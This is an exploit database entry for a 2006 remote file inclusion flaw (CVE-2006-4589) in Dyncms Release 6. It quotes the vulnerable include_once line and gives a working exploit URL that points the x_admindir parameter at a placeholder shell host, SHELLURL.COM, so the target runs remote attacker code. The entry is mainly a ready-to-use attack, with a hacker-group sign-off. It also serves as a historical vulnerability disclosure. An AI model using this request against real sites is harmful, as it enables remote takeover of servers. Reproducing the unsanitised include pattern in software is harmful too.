Dyncms Release 6 - 'x_admindir' Remote File Inclusion
Author: SHiKaA
type: webapps
platform: php
port:
date_added: 2006-09-01
date_updated:
verified: 1
codes: OSVDB-28430;CVE-2006-4589
tags:
aliases:
screenshot_url:
application_url:
#==============================================================================================
#Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.dyncms.com/
#
#Version : REleased
#
#================================================================================================
#Bug in : 0_admin/modules/Wochenkarte/frontend/index.php
#
#Vlu Code :
#--------------------------------
# include_once($x_admindir."/modules/".$xmodulname."/frontend/tools.inc.php");
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://SHELLURL.COM?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================
# milw0rm.com [2006-09-02]